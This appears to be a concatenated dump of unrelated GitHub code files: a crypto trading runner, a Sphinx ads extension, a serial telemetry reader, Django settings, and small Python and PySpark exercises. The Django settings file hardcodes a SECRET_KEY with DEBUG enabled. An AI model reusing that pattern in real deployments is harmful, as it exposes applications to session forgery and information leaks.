f\"decide_trades() returned a duplicate trade: {t}\"\n trade_set.add(t)\n\n # Log what our strategy decided\n if self.is_progress_report_needed():\n self.report_strategy_thinking(\n 
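# Editor's note (added; not in the upstream source): report_strategy_thinking()\n # has an empty base implementation above -- it is a pure logging/reporting hook\n # that live runner subclasses override to post the cycle's latest variables and\n # the single-pair visualisation; it is not expected to mutate state or trades.\n 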
strategy_cycle_timestamp=strategy_cycle_timestamp,\n cycle=cycle,\n universe=universe,\n state=state,\n trades=rebalance_trades,\n debug_details=debug_details)\n\n # Shortcut quit here if no trades are needed\n if len(rebalance_trades) == 0:\n logger.trade(\"No action taken: strategy decided not to open or close any positions\")\n return debug_details\n\n # Ask user confirmation for any trades\n with self.timed_task_context_manager(\"confirm_trades\"):\n approved_trades = self.approval_model.confirm_trades(state, rebalance_trades)\n assert type(approved_trades) == list\n logger.info(\"After approval we have %d trades left\", len(approved_trades))\n debug_details[\"approved_trades\"] = approved_trades\n\n # Log output\n if self.is_progress_report_needed():\n self.report_before_execution(strategy_cycle_timestamp, universe, state, approved_trades, debug_details)\n\n # Physically execute the trades\n with self.timed_task_context_manager(\"execute_trades\", trade_count=len(approved_trades)):\n\n # Unit tests can turn on this flag to make it easier to see why trades fail\n check_balances = debug_details.get(\"check_balances\", False)\n\n # Make sure our hot wallet nonce is up to date\n self.sync_model.resync_nonce()\n\n self.execution_model.execute_trades(\n strategy_cycle_timestamp,\n state,\n approved_trades,\n self.routing_model,\n routing_state,\n check_balances=check_balances)\n\n with self.timed_task_context_manager(\"post_execution\"):\n self.collect_post_execution_data(\n self.execution_context,\n pricing_model,\n approved_trades,\n )\n\n else:\n equity = state.portfolio.get_total_equity()\n logger.trade(\"Strategy has no trading capital and trade decision step was skipped. The total equity is %f USD, execution mode is %s\", equity, execution_context.mode.name)\n\n # Log output\n if self.is_progress_report_needed():\n self.report_after_execution(strategy_cycle_timestamp, universe, state, debug_details)\n\n return debug_details\n\n def check_position_triggers(self,\n clock: datetime.datetime,\n state: State,\n universe: StrategyExecutionUniverse,\n stop_loss_pricing_model: PricingModel,\n routing_state: RoutingState,\n ) -> List[TradeExecution]:\n \"\"\"Check stop loss/take profit for positions.\n\n Unlike trade rebalancing in tick():\n\n - Stop loss/take profit can occur only for existing positions.\n No new positions are opened.\n\n - The trading universe cannot change for these triggers,\n but remains stable between main ticks.\n\n - check_position_triggers() is much more lightweight and can be called much more frequently,\n even once per minute\n\n :return:\n List of generated stop loss trades\n \"\"\"\n\n if routing_state is None:\n # Dummy execution model\n return\n\n assert isinstance(routing_state, RoutingState)\n assert isinstance(stop_loss_pricing_model, PricingModel)\n\n debug_details = {}\n\n end_block = self.execution_model.get_safe_latest_block()\n logger.info(\"check_position_triggers() using block %s\", end_block)\n\n with self.timed_task_context_manager(\"check_position_triggers\"):\n\n # Sync treasury before the trigger checks\n with self.timed_task_context_manager(\"sync_portfolio_before_triggers\"):\n self.check_accounts(universe, state, report_only=True, end_block=end_block)\n self.sync_portfolio(clock, universe, state, debug_details, end_block=end_block)\n\n # Check that our on-chain balances are good\n with self.timed_task_context_manager(\"check_accounts_position_triggers\"):\n logger.info(\"Position trigger pre-trade accounts balance check\")\n 
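# Added clarifying comment (not in the upstream source): check_accounts()\n # compares on-chain token balances against the internal ledger one more time\n # right before any trigger trades are generated; without report_only=True it\n # raises UnexpectedAccountingCorrectionIssue on a mismatch and aborts.\n 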
self.check_accounts(universe, state, end_block=end_block)\n\n # We use PositionManager.close_position()\n # to generate trades to close stop loss positions\n position_manager = PositionManager(\n clock,\n universe,\n state,\n stop_loss_pricing_model,\n )\n\n triggered_trades = check_position_triggers(position_manager)\n\n approved_trades = self.approval_model.confirm_trades(state, triggered_trades)\n\n if approved_trades:\n logger.info(\"Executing %d stop loss/take profit trades at %s\", len(approved_trades), clock)\n self.execution_model.execute_trades(\n clock,\n state,\n approved_trades,\n self.routing_model,\n routing_state,\n check_balances=False)\n\n return approved_trades\n\n def repair_state(self, state: State) -> List[TradeExecution]:\n \"\"\"Repair unclean state issues.\n\n Currently supports:\n\n - Fixing unfinished trades\n\n :return:\n List of fixed trades\n \"\"\"\n\n logger.info(\"Repairing the state\")\n\n repaired = []\n repaired += self.execution_model.repair_unconfirmed_trades(state)\n return repaired\n\n def refresh_visualisations(self, state: State, universe: TradingStrategyUniverse):\n \"\"\"Update the visualisations in the run state.\n\n This will update `RunState.visualisations` for the current strategy.\n\n - In-process memory charts are served by webhook\n\n - In-process memory charts are posted to Discord, etc.\n\n - This is called on startup, so that we immediately have a good visualisation\n to show over the webhook when the web server boots up\n\n - This is called after each strategy thinking cycle is complete.\n\n The function is overridden by the child class with the actual strategy-runner-specific implementation.\n \"\"\"\n\n def check_accounts(\n self,\n universe: TradingStrategyUniverse,\n state: State,\n report_only=False,\n end_block: BlockNumber | NoneType = None\n ):\n \"\"\"Perform extra accounting checks on live trading startup.\n\n Must be enabled in the settings. 
Enabled by default for live trading.\n\n :param report_only:\n Don't crash if we get problems in accounts\n\n :param end_block:\n Check specifically at this block.\n\n If not given, use the latest block.\n\n :raise UnexpectedAccountingCorrectionIssue:\n Aborting execution.\n\n \"\"\"\n\n assert isinstance(universe, TradingStrategyUniverse)\n\n # Enzyme tests\n if len(state.portfolio.reserves) == 0:\n logger.info(\"No reserves, skipping accounting checks\")\n return\n\n if self.accounting_checks:\n clean, df = check_accounts(\n universe.data_universe.pairs,\n [universe.get_reserve_asset()],\n state,\n self.sync_model,\n block_identifier=end_block,\n )\n\n log_level = logging.INFO if report_only else logging.ERROR\n\n address = self.execution_model.get_balance_address()\n\n if not clean:\n block_message = f\"{end_block:,}\" if end_block else \"\"\n logger.log(\n log_level,\n f\"Accounting differences detected for: %s at block {block_message}\\n\" \n \"Differences are:\\n\"\n \"%s\",\n address,\n df.to_string()\n )\n\n if not report_only:\n logger.error(\"Aborting execution as we cannot reliably trade with incorrect balances.\")\n raise UnexpectedAccountingCorrectionIssue(\"Aborting execution as we cannot reliably trade with incorrect balances.\")\n else:\n # Path taken by some legacy tests\n logger.info(\"Accounting checks disabled - skipping\")","repo_name":"tradingstrategy-ai/trade-executor","sub_path":"tradeexecutor/strategy/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":34266,"program_lang":"python","lang":"en","doc_type":"code","stars":66,"dataset":"github-code","pt":"3"} +{"seq_id":"3776437773","text":"from pathlib import Path\nfrom typing import Any, Dict\n\nimport docutils.nodes\nimport jinja2\nfrom sphinx.application import Sphinx\nfrom sphinx.builders.html import StandaloneHTMLBuilder\nfrom sphinx.config import Config\nfrom sphinx.environment import BuildEnvironment\nfrom sphinx.errors import SphinxError\nfrom sphinx.util import copyfile\n\nfrom sphinx_ads.logging import get_logger\n\n# from sphinx_ads.directives.advertisement import AdsDirective\nfrom sphinx_ads.templates import Template\nfrom sphinx_ads.utils import load_data\n\nVERSION = \"0.0.2\"\n\n\ndef setup(app: Sphinx) -> Dict[str, Any]:\n log = get_logger(__name__)\n log.debug(\"Starting setup of Sphinx-Ads\")\n\n ########################################################################\n # CONFIG_VALUES\n ########################################################################\n # Define config values\n app.add_config_value(\"ads_path\", None, \"html\", types=[str])\n app.add_config_value(\"ads_url\", None, \"html\", types=[str])\n\n ########################################################################\n # DIRECTIVES\n ########################################################################\n\n # Define directives\n # app.add_directive(\"sphinx-ads\", AdsDirective)\n\n ########################################################################\n # EVENTS\n ########################################################################\n # Make connections to events\n app.connect(\"config-inited\", check_configuration)\n app.connect(\"builder-inited\", builder_inited)\n app.connect(\"html-page-context\", html_page_context)\n app.connect(\"env-updated\", add_static_files)\n\n # app.connect(\"env-before-read-docs\", prepare_env)\n\n return {\n \"version\": VERSION,\n \"parallel_read_safe\": True,\n \"parallel_write_safe\": True,\n }\n\n\ndef builder_inited(app: Sphinx) -> None:\n if not hasattr(app.env, 
\"sphinx_ads_data\"):\n # Used to store the Ads json data, so it can be easily accessible anywhere in the extension.\n app.env.sphinx_ads_data = {}\n\n load_data(app) # Loads the json data and updates env.sphinx_ads_data\n\n\ndef html_page_context(\n app: Sphinx,\n pagename: str,\n templatename: str,\n context: Dict,\n doctree: docutils.nodes.Node,\n):\n if isinstance(app.builder, StandaloneHTMLBuilder):\n template = Template(app)\n app.builder.templates.loaders.append(jinja2.FileSystemLoader(template.template_files))\n context[\"advertisement\"] = template.advertisement # Add custom Jinja function to app\n\n\n# def prepare_env(app: Sphinx, env: BuildEnvironment, _docname: str) -> None:\n# \"\"\"\n# Prepares the sphinx environment to store sphinx-ads JSON data.\n# \"\"\"\n# if not hasattr(env, \"sphinx_ads_data\"):\n# # Used to store the Ads json data, so it can be easily accessible anywhere in the extension package.\n# env.sphinx_ads_data = {}\n#\n# if app.config.ads_path is not None and len(app.config.ads_path) != 0:\n# ads_json_data: Dict = get_json_data_from_path(app)\n# env.sphinx_ads_data.update(ads_json_data)\n#\n# if app.config.ads_url is not None and len(app.config.ads_url) != 0:\n# ads_json_data: Dict = get_json_data_from_url(app)\n# env.sphinx_ads_data.update(ads_json_data)\n#\n\n\ndef check_configuration(app: Sphinx, config: Config) -> None:\n \"\"\"\n Checks the configuration options.\n \"\"\"\n if (not config[\"ads_path\"] and not config[\"ads_url\"]) or (config[\"ads_path\"] and config[\"ads_url\"]):\n raise AdsConfigException(\"You must provide one of these variables: 'ads_path' or 'ads_url', in conf.py.\")\n\n\ndef add_static_files(app: Sphinx, env: BuildEnvironment):\n log = get_logger(__name__)\n log.info(\"Copying static files for sphinx-ads\")\n\n if app.builder.format == \"html\":\n ads_libs_dir = Path(app.builder.outdir).joinpath(\"_static\")\n source_dir = Path(__file__).parent / \"libs\"\n destination_dir = ads_libs_dir / \"sphinx_ads\"\n destination_dir.mkdir(parents=True, exist_ok=True)\n\n css_file = source_dir.joinpath(\"css/sphinx_ads.css\").resolve()\n js_file = source_dir.joinpath(\"js/sphinx_ads.js\").resolve()\n\n copyfile(str(css_file), str(destination_dir / \"sphinx_ads.css\")) # copy CSS file\n copyfile(str(js_file), str(destination_dir / \"sphinx_ads.js\")) # copy JS file\n\n # link CSS and JS files to HTML document\n app.add_css_file(\"sphinx_ads/sphinx_ads.css\", rel=\"stylesheet\")\n app.add_js_file(\"sphinx_ads/sphinx_ads.js\")\n\n\nclass AdsConfigException(SphinxError):\n pass\n","repo_name":"useblocks/sphinx-ads","sub_path":"sphinx_ads/ads.py","file_name":"ads.py","file_ext":"py","file_size_in_byte":4583,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"22631936359","text":"import os\nimport django\n\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'telemetry_project.settings')\n\ndjango.setup()\n\nimport serial\nimport time\nimport api.models\nimport pathlib\nimport re\n\nser = serial.Serial('/dev/ttyUSB0', 57600)\n\nall_text = ''\nlog = ''\n\nprevious_mode = '0'\n\nwhile True:\n try:\n with open('carry.txt', 'r') as dest:\n carry = dest.read()\n\n if carry == '1':\n ser.write('servo'.encode('utf-8'))\n\n with open('carry.txt', 'w') as dest:\n dest.write('0')\n \n with open('motor.txt', 'r') as dest:\n motor = dest.read()\n\n if motor == '1':\n ser.write('motor'.encode('utf-8'))\n\n with open('motor.txt', 'w') as dest:\n dest.write('0')\n\n with open('mode.txt', 'r') as dest:\n mode = 
dest.read()\n\n if mode != previous_mode:\n if mode == '1':\n ser.write('manual'.encode('utf-8'))\n else:\n ser.write('auto'.encode('utf-8'))\n\n previous_mode = mode\n\n time.sleep(1)\n data_read = ser.read_all().decode()\n\n all_text += data_read\n\n if 'begin' in all_text:\n print('began')\n\n while 'end' not in data_read:\n time.sleep(1)\n data_read = ser.read_all().decode()\n\n print(data_read)\n\n all_text += data_read\n\n print(all_text)\n\n log = all_text[all_text.index('begin') : all_text.index('end')]\n\n all_text = all_text[all_text.index('end') + 3 :]\n\n print('end')\n\n all_data = [data.strip() for data in re.split(\"[\\n:]+\", log)]\n\n log = log.replace('begin', '================================================')\n log += '================================================\\n'\n\n request_type = all_data[all_data.index('request_type') + 1]\n\n device_id = int(all_data[all_data.index('device_id') + 1])\n\n print(all_data)\n\n date = all_data[all_data.index('date') + 1]\n time_ = all_data[all_data.index('time') + 1].replace('.', ':')\n gps = all_data[all_data.index('gps') + 1]\n gps_find_satellite = all_data[all_data.index('gps_find_satellite') + 1]\n\n if request_type == 'NEW_DEVICE':\n api.models.Device.objects.create(\n date = date,\n time = time_,\n device_id = device_id,\n gps = gps,\n gps_find_satellite = gps_find_satellite,\n device_name = ''\n )\n\n pathlib.Path(f'api/logs/out{device_id}.log').touch()\n\n with open(f'api/logs/out{device_id}.log', 'a') as dest:\n dest.write(log)\n\n log = ''\n\n elif 'abcdefghijklmnopqrstuvwxyz' in all_text:\n ser.write('attaboy'.encode())\n except Exception as e:\n print(e)\n continue\n\nser.close()\n","repo_name":"zIlgar/Caspian_Rescuer","sub_path":"telemetry_project/telemetry_project/read.py","file_name":"read.py","file_ext":"py","file_size_in_byte":3021,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"5394311444","text":"# Django settings for mobilevrs_project project.\n# Django settings for mobilevrs_project project.\nimport sys, os\n\nfiledir = os.path.dirname(__file__)\nsys.path.append(os.path.join(filedir))\nsys.path.append(os.path.join(filedir, 'rapidsms_httprouter_src'))\nsys.path.append(os.path.join(filedir, 'rapidsms_xform_src'))\nsys.path.append(os.path.join(filedir, 'django_eav'))\nsys.path.append(os.path.join(filedir, 'rapidsms_uganda_ussd'))\nsys.path.append(os.path.join(filedir, 'rapidsms_uganda_common'))\nsys.path.append(os.path.join(filedir, 'rapidsms_script'))\nsys.path.append(os.path.join(filedir, 'rapidsms_polls'))\nsys.path.append(os.path.join(filedir, 'rapidsms_generic'))\nsys.path.append(os.path.join(filedir, 'rapidsms', 'lib'))\n\n\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\n\nADMINS = (\n # ('Your Name', 'your_email@example.com'),\n)\n\nMANAGERS = ADMINS\n\nDATABASES = {\n 'default': {\n 'ENGINE' : 'django.db.backends.postgresql_psycopg2',\n 'NAME': 'mobilevrs',\n 'USER': 'postgres',\n 'HOST': 'dbserver',\n },}\n\n# Local time zone for this installation. Choices can be found here:\n# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name\n# although not all choices may be available on all operating systems.\n# On Unix systems, a value of None will cause Django to use the same\n# timezone as the operating system.\n# If running in a Windows environment this must be set to the same as your\n# system time zone.\nTIME_ZONE = 'America/Chicago'\n\n# Language code for this installation. 
All choices can be found here:\n# http://www.i18nguy.com/unicode/language-identifiers.html\nLANGUAGE_CODE = 'en-us'\n\nSITE_ID = 1\n\n# If you set this to False, Django will make some optimizations so as not\n# to load the internationalization machinery.\nUSE_I18N = True\n\n# If you set this to False, Django will not format dates, numbers and\n# calendars according to the current locale\nUSE_L10N = True\n\n# Absolute filesystem path to the directory that will hold user-uploaded files.\n# Example: \"/home/media/media.lawrence.com/media/\"\nMEDIA_ROOT = ''\n\n# URL that handles the media served from MEDIA_ROOT. Make sure to use a\n# trailing slash.\n# Examples: \"http://media.lawrence.com/media/\", \"http://example.com/media/\"\nMEDIA_URL = ''\n\n# Absolute path to the directory static files should be collected to.\n# Don't put anything in this directory yourself; store your static files\n# in apps' \"static/\" subdirectories and in STATICFILES_DIRS.\n# Example: \"/home/media/media.lawrence.com/static/\"\nSTATIC_ROOT = ''\n\n# URL prefix for static files.\n# Example: \"http://media.lawrence.com/static/\"\nSTATIC_URL = '/static/'\n\n# URL prefix for admin static files -- CSS, JavaScript and images.\n# Make sure to use a trailing slash.\n# Examples: \"http://foo.com/static/admin/\", \"/static/admin/\".\nADMIN_MEDIA_PREFIX = '/static/admin/'\n\n# Additional locations of static files\nSTATICFILES_DIRS = (\n # Put strings here, like \"/home/html/static\" or \"C:/www/django/static\".\n # Always use forward slashes, even on Windows.\n # Don't forget to use absolute paths, not relative paths.\n)\n\n# List of finder classes that know how to find static files in\n# various locations.\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n# 'django.contrib.staticfiles.finders.DefaultStorageFinder',\n)\n\n# Make this unique, and don't share it with anybody.\nSECRET_KEY = 'slf#_02l51!e(ng%(z%79niv7+ql^_3@$6a+iw))uo1c!7mg%*'\n\n# List of callables that know how to import templates from various sources.\nTEMPLATE_LOADERS = (\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n# 'django.template.loaders.eggs.Loader',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n #'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n)\n\nROOT_URLCONF = 'urls'\n\nTEMPLATE_DIRS = (\n # Put strings here, like \"/home/html/django_templates\" or \"C:/www/django/templates\".\n # Always use forward slashes, even on Windows.\n # Don't forget to use absolute paths, not relative paths.\n)\n\nINSTALLED_APPS = (\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.admin',\n 'ussd',\n 'rapidsms_xforms',\n 'eav',\n 'django_extensions',\n 'mobilevrs',\n 'rapidsms',\n 'uganda_common',\n 'script',\n 'poll',\n 'generic',\n 'rapidsms_httprouter',\n 'south',\n)\n\n# A sample logging configuration. 
The only tangible logging\n# performed by this configuration is to send an email to\n# the site admins on every HTTP 500 error.\n# See http://docs.djangoproject.com/en/dev/topics/logging for\n# more details on how to customize your logging configuration.\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'handlers': {\n 'mail_admins': {\n 'level': 'ERROR',\n 'class': 'django.utils.log.AdminEmailHandler'\n }\n },\n 'loggers': {\n 'django.request': {\n 'handlers': ['mail_admins'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n }\n}\n\n\n#caching stuff\nCACHES = {\n 'default': {\n 'BACKEND': 'django.core.cache.backends.db.DatabaseCache',\n 'LOCATION': 'cache_table',\n }\n}\n\n\nINITIAL_USSD_SCREEN='ussd_root'\n\ntry:\n if os.environ.has_key('LOCAL_SETTINGS'):\n # the LOCAL_SETTINGS environment variable is used by the build server\n sys.path.insert(0, os.path.dirname(os.environ['LOCAL_SETTINGS']))\n from settings_test import *\n else:\n from localsettings import *\nexcept ImportError:\n pass","repo_name":"unicefuganda/mobileVRS","sub_path":"mobilevrs_project/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":5892,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"284917464","text":"from django.db import models\nfrom company.models import Company\nfrom employee.models import Employee\n\nclass Address(models.Model):\n street_line1 = models.CharField('Address 1', max_length = 100, blank = True)\n street_line2 = models.CharField('Address 2', max_length = 100, blank = True)\n zipcode = models.CharField('ZIP code', max_length = 6, blank = True)\n city = models.CharField('City', max_length = 100, blank = True)\n state = models.CharField('State', max_length = 100, blank = True)\n employee = models.ForeignKey(Employee, on_delete=models.CASCADE, related_name='employee_address', null=True)\n company = models.ForeignKey(Company, on_delete=models.CASCADE, related_name='company_address', null=True)\n \n class Meta:\n verbose_name = \"Address\"\n verbose_name_plural = \"Addresses\"\n\n def __str__(self):\n return f\"{self.street_line1}\"\n","repo_name":"DamodarVishwakarma/EMP","sub_path":"EMP/apps/shared/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"73389189840","text":"import json, time, shutil\nimport os, errno\nfrom urllib.request import urlopen\n\nfrom webapp.DBManager import DBManager\nfrom webapp.vars import CUSTOM_TREND_DIR, DATA_ENTRYPOINT\n\nclass CustomTrend():\n \"\"\"A class to manage customized trend search\n All custom trends are stored in CUSTOM_TREND_DIR (Path: data/ct/ct_id).\n Every custom trend folder must have a config.json file and a data_x.json file.\n \"\"\"\n\n\n def __init__(self, ct_id = None):\n self.ct_id = ct_id\n self.config = None\n self.data = None\n self.db = DBManager()\n\n def delete(self):\n \"\"\" Delete custom trend\n N.B. 
The ct_id must be set\n\n Return:\n result (boolean) - deletion result\n \"\"\"\n self.db.open()\n result = self.db.delete('DELETE FROM customTrends WHERE id=?', (self.ct_id,))\n self.db.close()\n return result\n\n def add(self, user_id, title):\n \"\"\" Add a new custom trend\n\n Return:\n new_id (integer) - New custom trend id\n \"\"\"\n self.db.open()\n new_id, _ = self.db.insert('INSERT INTO customTrends (userId, title) VALUES (?,?)', (user_id, title))\n self.db.close()\n\n filename = \"{}{}/config.json\".format(CUSTOM_TREND_DIR, new_id)\n if not os.path.exists(os.path.dirname(filename)):\n try:\n os.makedirs(os.path.dirname(filename))\n except Exception:\n raise\n\n with open(\"{}{}/config.json\".format(CUSTOM_TREND_DIR, new_id), 'w') as f:\n default_config = {\n \"custom_config\": {\n \"alert_influencers\": True,\n \"alert_sentiment\": True,\n \"alert_trends\": True,\n \"algorithm\": 1,\n \"analysis_emoji\": True,\n \"analysis_images\": True,\n \"analysis_text\": True,\n \"georeference\": \"it\",\n \"keywords\": \"\",\n \"language\": \"it\",\n \"main_param\": 1,\n \"plot1\": \"bar_sentiment\",\n \"plot2\": \"bar_sentiment\",\n \"plot3\": \"bar_sentiment\",\n \"source_gogl\": True,\n \"source_ig\": True,\n \"source_tw\": True,\n \"timeframe\": 7,\n \"report\": 1\n },\n \"custom_trend_id\": new_id,\n \"key\": title\n }\n json.dump(default_config, f)\n\n self.ct_id = new_id\n return new_id\n\n\n def loadConfig(self, ct_id):\n \"\"\"Load custom trend configuration from file\n\n Params:\n ct_id (integer) - custom trend ID\n Return:\n result (boolean) - loading result\n \"\"\"\n\n self.ct_id = ct_id\n\n # Return False when the config file is missing or unreadable;\n # previously the trailing `return False` was unreachable.\n try:\n with open(\"{}{}/config.json\".format(CUSTOM_TREND_DIR, self.ct_id)) as f:\n self.config = json.load(f)\n return True\n except (OSError, ValueError):\n return False\n\n\n def loadData(self):\n \"\"\"Load custom trend data. \n N.B. Before this operation configuration must be loaded.\n\n Return:\n result (boolean) - loading result\n \"\"\"\n \n try: \n data_url = '{}{}/data.json'.format(DATA_ENTRYPOINT, self.ct_id)\n data_response = urlopen(data_url)\n self.data = json.loads(data_response.read())\n return True\n\n except Exception:\n return False\n \n\n def saveConfig(self):\n \"\"\"Save current configuration to config.json file. \n N.B. 
Before this operation configuration must be loaded.\n\n Return:\n result (boolean) - saving result\n \"\"\"\n\n if self.ct_id != None and self.config != None and self.config:\n with open(\"{}{}/config.json\".format(CUSTOM_TREND_DIR, self.ct_id), 'w') as f:\n json.dump(self.config, f)\n \n self.db.open()\n self.db.update('UPDATE customTrends SET title=?WHERE id=?', (self.config['key'], self.config['custom_trend_id']))\n self.db.close()\n\n return True\n\n return False \n","repo_name":"brightdev0101/AnteoAI_python","sub_path":"webapp/dataobj/CustomTrend.py","file_name":"CustomTrend.py","file_ext":"py","file_size_in_byte":4206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"43023607784","text":"# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport boto3\nimport pretend\nimport pytest\n\nfrom warehouse import aws\n\n\n@pytest.mark.parametrize(\"region\", [None, \"us-west-2\"])\ndef test_aws_session_factory(monkeypatch, region):\n boto_session_obj = pretend.stub()\n boto_session_cls = pretend.call_recorder(lambda **kw: boto_session_obj)\n monkeypatch.setattr(boto3.session, \"Session\", boto_session_cls)\n\n request = pretend.stub(\n registry=pretend.stub(\n settings={\"aws.key_id\": \"my key\", \"aws.secret_key\": \"my secret\"}\n )\n )\n\n if region is not None:\n request.registry.settings[\"aws.region\"] = region\n\n assert aws.aws_session_factory(None, request) is boto_session_obj\n assert boto_session_cls.calls == [\n pretend.call(\n aws_access_key_id=\"my key\",\n aws_secret_access_key=\"my secret\",\n **({} if region is None else {\"region_name\": region})\n )\n ]\n\n\ndef test_includeme():\n config = pretend.stub(\n register_service_factory=pretend.call_recorder(lambda factory, name: None)\n )\n\n aws.includeme(config)\n\n assert config.register_service_factory.calls == [\n pretend.call(aws.aws_session_factory, name=\"aws.session\")\n ]\n","repo_name":"pypi/warehouse","sub_path":"tests/unit/test_aws.py","file_name":"test_aws.py","file_ext":"py","file_size_in_byte":1734,"program_lang":"python","lang":"en","doc_type":"code","stars":3382,"dataset":"github-code","pt":"3"} +{"seq_id":"74443776722","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef main():\n\n omega = np.reshape(np.loadtxt('omega.txt'), (NY, NX))\n\n plt.pcolor(\n omega, \n vmin=-100,\n vmax=100, \n cmap='magma'\n )\n \n plt.savefig('IC.png')\n\n return\n\n\nif __name__ == '__main__':\n\n NX = 128\n NY = 128\n\n main()","repo_name":"guemesturb/hit2d","sub_path":"plotIC.py","file_name":"plotIC.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"71439938001","text":"#Exercício Python 037: Escreva um programa em Python que leia um número inteiro qualquer e peça para o usuário escolher qual será a base de conversão: 1 para binário, 2 para octal e 3 para hexadecimal.\nnumber = int(input('digite um numero inteiro: '))\nprint('''escolha uma das opçoes\n1 
para binario\n2 para octal \n3 para hexadecimal\n''')\noption = int(input('qual opçao desejada? '))\nif option == '1' or option == 1:\n bina = bin(number)\n print('o numero {} convertido em binario é {}'.format(number,bina[2:]))\nif option == '2' or option == 2:\n octa = oct(number)\n print('o numero {} convertido em octal é {}'.format(number,octa[2:]))\nif option == '3' or option == 3:\n hexa = hex(number)\n print('o numero {} convertido em hexadecimal é {}'.format(number, hexa[2:]))\n","repo_name":"gabrielwallaceBDS/exercicios-python-3","sub_path":"exercicios/ex037.py","file_name":"ex037.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"33122118517","text":"def silnia1(n):\n wynik = 1\n for i in range(1,n+1):\n wynik = wynik * i\n return wynik\n\ndef silnia2(n):\n if n == 1:\n return 1\n return n * silnia2(n-1)\n\ndef silnia3(n):\n def go(n, r):\n if n == 1:\n return r\n return go(n - 1, r * (n - 1))\n return go(n, n)\n\n\n# print(silnia1(500))\n# print(silnia2(500))\n# print(silnia3(500))\n\ndef ciag_f(n):\n if n == 0:\n return 0\n elif n == 1:\n return 1\n else:\n return ciag_f(n-1) + ciag_f(n-2)\n\nprint(ciag_f(40))\n\ndef ciag_fib(n):\n if n == 0:\n return 0\n elif n == 1:\n return 1\n else:\n a = 0\n b = 1\n for i in range(n):\n c = a + b\n a = b\n b = c\n return a\n\nprint(ciag_fib(40))","repo_name":"majajonez/algorytmy","sub_path":"rekurencja.py","file_name":"rekurencja.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"19683750080","text":"'''\r\nDetails - Duration 15 to 20 minutes\r\nData is available in local file system /data/retail_db\r\nSource directories: /data/retail_db/orders and /data/retail_db/customers\r\nSource delimiter: comma (“,”)\r\nSource Columns - orders - order_id, order_date, order_customer_id, order_status\r\nSource Columns - customers - customer_id, customer_fname, customer_lname and many more\r\nGet the customers who have not placed any orders, sorted by customer_lname and then customer_fname\r\nTarget Columns: customer_lname, customer_fname\r\nNumber of files - 1\r\nTarget Directory: /user//solutions/solutions02/inactive_customers\r\nTarget File Format: TEXT\r\nTarget Delimiter: comma (“, ”)\r\nCompression: N/A\r\n\r\n'''\r\n\r\nordersRaw = open(\"/data/retail_db/orders/part-00000\").read().splitlines()\r\nordersRDD = sc.parallelize(ordersRaw)\r\n\r\ncustomersRaw= open(\"/data/retail_db/customers/part-00000\").read().splitlines()\r\ncustomersRDD = sc.parallelize(customersRaw)\r\n\r\nordersDF = ordersRDD.map(lambda r: (int(r.split(\",\")[0]),str(r.split(\",\")[2]))). \\\r\ntoDF(schema=[\"order_id\",\"order_customer_id\"])\r\n\r\nordersDF.registerTempTable(\"orders\")\r\n\r\ncustomerDF = customersRDD. \\\r\nmap(lambda c: (int(c.split(\",\")[0]),c.split(\",\")[2],c.split(\",\")[1])). \\\r\ntoDF(schema =([\"customer_id\",\"customer_lname\",\"customer_fname\"]))\r\n\r\n\r\ncustomerDF.registerTempTable(\"customers\")\r\n\r\nresultDF=sqlContext.sql(\"select distinct customer_lname , customer_fname \\\r\n\tfrom customers c left outer join orders o \\\r\n\ton order_customer_id = customer_id \\\r\n\twhere order_customer_id is NULL \\\r\n\torder by customer_lname,customer_fname\")\r\n\r\n\r\nresultDF.map(lambda r: r[0]+\", \"+r[1]).coalesce(1). 
